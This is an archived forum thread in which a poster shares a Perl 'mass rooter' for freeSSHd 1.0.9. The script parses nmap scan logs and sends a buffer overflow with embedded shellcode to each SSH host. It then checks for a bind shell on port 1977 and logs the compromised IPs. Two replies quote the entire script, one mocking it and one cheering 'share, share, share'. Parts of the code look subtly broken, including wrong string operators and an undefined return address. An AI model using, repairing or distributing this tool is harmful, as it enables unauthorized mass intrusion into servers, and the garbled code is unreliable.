Velocity Reviews - Computer Hardware Reviews

Velocity Reviews > Newsgroups > Computing > Computer Security > freesshd 1.0.9 massr00ter

Reply
Thread Tools

freesshd 1.0.9 massr00ter

 
 
cyberstorm
Guest
Posts: n/a
 
      06-16-2006
Here is an freesshd massrooter it will be check and hack
from the nmap portscan logs. Have Fun with
this tool:

#!/usr/bin/perl

use Socket;
use IO::Socket::INET;

my $port = '22';
my @banner = (22);
my $info = "+++++++++++++++++++++++++++++++++++++++++++++ \n".
"+ +\n".
"+ freeSSHd 1.0.9 Mass r00ter +\n".
"+ +\n".
"+ Author: cyberstorm +\n".
"+ Contact: cyberstorm187[at]arcor.de +\n".
"+ NON-PUBLIC!! Keep it PRIVATE!PRIVATE! +\n".
"+ +\n".
"+++++++++++++++++++++++++++++++++++++++++++++ \n";

my $shellcode =
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\ x24\x24\x8b\x45".
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\ x20\x01\xeb\x49".
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\ x07\xc1\xca\x0d".
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\ x24\x01\xeb\x66".
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\ x6c\x24\x1c\x61".
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\ x1c\xad\x8b\x40".
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\ x66\x68\x33\x32".
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\ x3b\x50\xff\xd6".
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\ xd0\x68\xd9\x09".
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\ x43\x53\xff\xd0".
"\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\ x70\xc7\x57\xff".
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\ x57\xff\xd6\x53".
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\ x54\x54\x55\xff".
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\ xd0\x66\x6a\x64".
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\ xe7\x6a\x44\x89".
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\ x8d\x7a\x38\xab".
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\ x5b\x57\x52\x51".
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\ xd9\x05\xce\x53".
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\ xc4\x64\xff\xd6".
"\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\ xd0";

print "$info";
&usage if !@ARGV; &main;


sub main {
while (<>) {
if (/^Interesting ports on.*\((\S+)\):/) {
$ip = $1; $i++;
} foreach $port (@banner) {
if (/^$port\/(\w+)\s+open/) {
$proto = $1; $p++;
&banner($ip, $port, $proto);
}
}
} &stats;
}

sub banner {
my ($ip, $port, $proto) = @_;
print "$ip:$port\t=> ";
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
connect(SOCK, sockaddr_in($port, inet_aton($ip)));
if ($port != 80) {
$banner =<SOCK>;
close(SOCK);
print "$banner";
} else {
send(SOCK, "GET / HTTP/1.0\n\n", 0);
@o = <SOCK>;
close(SOCK);
foreach (@o) {
if (/Server:\s(.*)/) {
$banner = $1;
print "$banner";
}
}
}
if($banner != 'SSH-2.0-WeOnlyDo 1.2.7'){
&exploit($ip,$port,$proto);
}
}

sub exploit {
my ($ip,$port,$proto) = @_;
if ($check_before = IO::Socket::INET->new(PeerAddr => "$ip:22")){
my $buff =
"\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\ x6e\x53\x53\x48".
"\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\ x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x07\xde";

my $buff = $buff + "A" * 1055;
my $buff = $buff + $eip;
my $buff = $buff + "yyyy";
my $buff = $buff + "\x90" * 4;
my $buff = $buff + $shellcode;
my $buff = $buff + "B" * 19021 + "\r\n";

print "[~] Try to connect to $ip\n";
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
connect(SOCK, sockaddr_in($port, inet_aton($ip)));
print "[~] Creating Buffer\n";
send(SOCK, $buff, 0);
close(SOCK);
print "[~] Send Buffer\n";
print "[~] checking ...\n";

sleep(1);
if ($check = IO::Socket::INET->new(PeerAddr => "$ip:1977")){
print "[~] YoU got an Shell\n".
"Connect over Telnet on Port 1977\n";
open(OUTPUT, '>>freesshd.txt');
print OUTPUT "$ip\n";
close(OUTPUT);
} else {
print "Sorry, Dude !\n";
}
}
}

sub usage {
print "freesshd.pl <infile>\n";
}

 
Reply With Quote
 
 
 
 
Geordie Guy
Guest
Posts: n/a
 
      06-17-2006
cyberstorm wrote:
> Here is an freesshd massrooter it will be check and hack
> from the nmap portscan logs. Have Fun with
> this tool:
>
> #!/usr/bin/perl
>
> use Socket;
> use IO::Socket::INET;
>
> my $port = '22';
> my @banner = (22);
> my $info = "+++++++++++++++++++++++++++++++++++++++++++++ \n".
> "+ +\n".
> "+ freeSSHd 1.0.9 Mass r00ter +\n".
> "+ +\n".
> "+ Author: cyberstorm +\n".
> "+ Contact: cyberstorm187[at]arcor.de +\n".
> "+ NON-PUBLIC!! Keep it PRIVATE!PRIVATE! +\n".
> "+ +\n".
> "+++++++++++++++++++++++++++++++++++++++++++++ \n";
>
> my $shellcode =
> "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\ x24\x24\x8b\x45".
> "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\ x20\x01\xeb\x49".
> "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\ x07\xc1\xca\x0d".
> "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\ x24\x01\xeb\x66".
> "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\ x6c\x24\x1c\x61".
> "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\ x1c\xad\x8b\x40".
> "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\ x66\x68\x33\x32".
> "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\ x3b\x50\xff\xd6".
> "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\ xd0\x68\xd9\x09".
> "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\ x43\x53\xff\xd0".
> "\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\ x70\xc7\x57\xff".
> "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\ x57\xff\xd6\x53".
> "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\ x54\x54\x55\xff".
> "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\ xd0\x66\x6a\x64".
> "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\ xe7\x6a\x44\x89".
> "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\ x8d\x7a\x38\xab".
> "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\ x5b\x57\x52\x51".
> "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\ xd9\x05\xce\x53".
> "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\ xc4\x64\xff\xd6".
> "\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\ xd0";
>
> print "$info";
> &usage if !@ARGV; &main;
>
>
> sub main {
> while (<>) {
> if (/^Interesting ports on.*\((\S+)\):/) {
> $ip = $1; $i++;
> } foreach $port (@banner) {
> if (/^$port\/(\w+)\s+open/) {
> $proto = $1; $p++;
> &banner($ip, $port, $proto);
> }
> }
> } &stats;
> }
>
> sub banner {
> my ($ip, $port, $proto) = @_;
> print "$ip:$port\t=> ";
> socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
> connect(SOCK, sockaddr_in($port, inet_aton($ip)));
> if ($port != 80) {
> $banner =<SOCK>;
> close(SOCK);
> print "$banner";
> } else {
> send(SOCK, "GET / HTTP/1.0\n\n", 0);
> @o = <SOCK>;
> close(SOCK);
> foreach (@o) {
> if (/Server:\s(.*)/) {
> $banner = $1;
> print "$banner";
> }
> }
> }
> if($banner != 'SSH-2.0-WeOnlyDo 1.2.7'){
> &exploit($ip,$port,$proto);
> }
> }
>
> sub exploit {
> my ($ip,$port,$proto) = @_;
> if ($check_before = IO::Socket::INET->new(PeerAddr => "$ip:22")){
> my $buff =
> "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\ x6e\x53\x53\x48".
> "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\ x00\x00\x00\x00".
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x07\xde";
>
> my $buff = $buff + "A" * 1055;
> my $buff = $buff + $eip;
> my $buff = $buff + "yyyy";
> my $buff = $buff + "\x90" * 4;
> my $buff = $buff + $shellcode;
> my $buff = $buff + "B" * 19021 + "\r\n";
>
> print "[~] Try to connect to $ip\n";
> socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
> connect(SOCK, sockaddr_in($port, inet_aton($ip)));
> print "[~] Creating Buffer\n";
> send(SOCK, $buff, 0);
> close(SOCK);
> print "[~] Send Buffer\n";
> print "[~] checking ...\n";
>
> sleep(1);
> if ($check = IO::Socket::INET->new(PeerAddr => "$ip:1977")){
> print "[~] YoU got an Shell\n".
> "Connect over Telnet on Port 1977\n";
> open(OUTPUT, '>>freesshd.txt');
> print OUTPUT "$ip\n";
> close(OUTPUT);
> } else {
> print "Sorry, Dude !\n";
> }
> }
> }
>
> sub usage {
> print "freesshd.pl <infile>\n";
> }
>

Keep it PRIVATE PRIVATE!!!
By posting it to a news group LOL
 
Reply With Quote
 
 
 
 
imhotep
Guest
Posts: n/a
 
      06-18-2006
Geordie Guy wrote:

> cyberstorm wrote:
>> Here is an freesshd massrooter it will be check and hack
>> from the nmap portscan logs. Have Fun with
>> this tool:
>>
>> #!/usr/bin/perl
>>
>> use Socket;
>> use IO::Socket::INET;
>>
>> my $port = '22';
>> my @banner = (22);
>> my $info = "+++++++++++++++++++++++++++++++++++++++++++++ \n".
>> "+ +\n".
>> "+ freeSSHd 1.0.9 Mass r00ter +\n".
>> "+ +\n".
>> "+ Author: cyberstorm +\n".
>> "+ Contact: cyberstorm187[at]arcor.de +\n".
>> "+ NON-PUBLIC!! Keep it PRIVATE!PRIVATE! +\n".
>> "+ +\n".
>> "+++++++++++++++++++++++++++++++++++++++++++++ \n";
>>
>> my $shellcode =
>> "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\ x24\x24\x8b\x45".
>> "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\ x20\x01\xeb\x49".
>> "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\ x07\xc1\xca\x0d".
>> "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\ x24\x01\xeb\x66".
>> "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\ x6c\x24\x1c\x61".
>> "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\ x1c\xad\x8b\x40".
>> "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\ x66\x68\x33\x32".
>> "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\ x3b\x50\xff\xd6".
>> "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\ xd0\x68\xd9\x09".
>> "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\ x43\x53\xff\xd0".
>> "\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\ x70\xc7\x57\xff".
>> "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\ x57\xff\xd6\x53".
>> "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\ x54\x54\x55\xff".
>> "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\ xd0\x66\x6a\x64".
>> "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\ xe7\x6a\x44\x89".
>> "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\ x8d\x7a\x38\xab".
>> "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\ x5b\x57\x52\x51".
>> "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\ xd9\x05\xce\x53".
>> "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\ xc4\x64\xff\xd6".
>> "\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\ xd0";
>>
>> print "$info";
>> &usage if !@ARGV; &main;
>>
>>
>> sub main {
>> while (<>) {
>> if (/^Interesting ports on.*\((\S+)\):/) {
>> $ip = $1; $i++;
>> } foreach $port (@banner) {
>> if (/^$port\/(\w+)\s+open/) {
>> $proto = $1; $p++;
>> &banner($ip, $port, $proto);
>> }
>> }
>> } &stats;
>> }
>>
>> sub banner {
>> my ($ip, $port, $proto) = @_;
>> print "$ip:$port\t=> ";
>> socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
>> connect(SOCK, sockaddr_in($port, inet_aton($ip)));
>> if ($port != 80) {
>> $banner =<SOCK>;
>> close(SOCK);
>> print "$banner";
>> } else {
>> send(SOCK, "GET / HTTP/1.0\n\n", 0);
>> @o = <SOCK>;
>> close(SOCK);
>> foreach (@o) {
>> if (/Server:\s(.*)/) {
>> $banner = $1;
>> print "$banner";
>> }
>> }
>> }
>> if($banner != 'SSH-2.0-WeOnlyDo 1.2.7'){
>> &exploit($ip,$port,$proto);
>> }
>> }
>>
>> sub exploit {
>> my ($ip,$port,$proto) = @_;
>> if ($check_before = IO::Socket::INET->new(PeerAddr => "$ip:22")){
>> my $buff =
>> "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\ x6e\x53\x53\x48".
>> "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\ x00\x00\x00\x00".
>> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x07\xde";
>>
>> my $buff = $buff + "A" * 1055;
>> my $buff = $buff + $eip;
>> my $buff = $buff + "yyyy";
>> my $buff = $buff + "\x90" * 4;
>> my $buff = $buff + $shellcode;
>> my $buff = $buff + "B" * 19021 + "\r\n";
>>
>> print "[~] Try to connect to $ip\n";
>> socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
>> connect(SOCK, sockaddr_in($port, inet_aton($ip)));
>> print "[~] Creating Buffer\n";
>> send(SOCK, $buff, 0);
>> close(SOCK);
>> print "[~] Send Buffer\n";
>> print "[~] checking ...\n";
>>
>> sleep(1);
>> if ($check = IO::Socket::INET->new(PeerAddr => "$ip:1977")){
>> print "[~] YoU got an Shell\n".
>> "Connect over Telnet on Port 1977\n";
>> open(OUTPUT, '>>freesshd.txt');
>> print OUTPUT "$ip\n";
>> close(OUTPUT);
>> } else {
>> print "Sorry, Dude !\n";
>> }
>> }
>> }
>>
>> sub usage {
>> print "freesshd.pl <infile>\n";
>> }
>>

> Keep it PRIVATE PRIVATE!!!
> By posting it to a news group LOL



No, share, share, share!!!

Im
--
*************************************
Pass a Net Neutrality Law in the US!!!!

Save the Internet:
http://www.savetheinternet.com/

Its our net:
http://www.itsournet.org/

*************************************
 
Reply With Quote
 
 
 
Reply

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are Off




Advertisments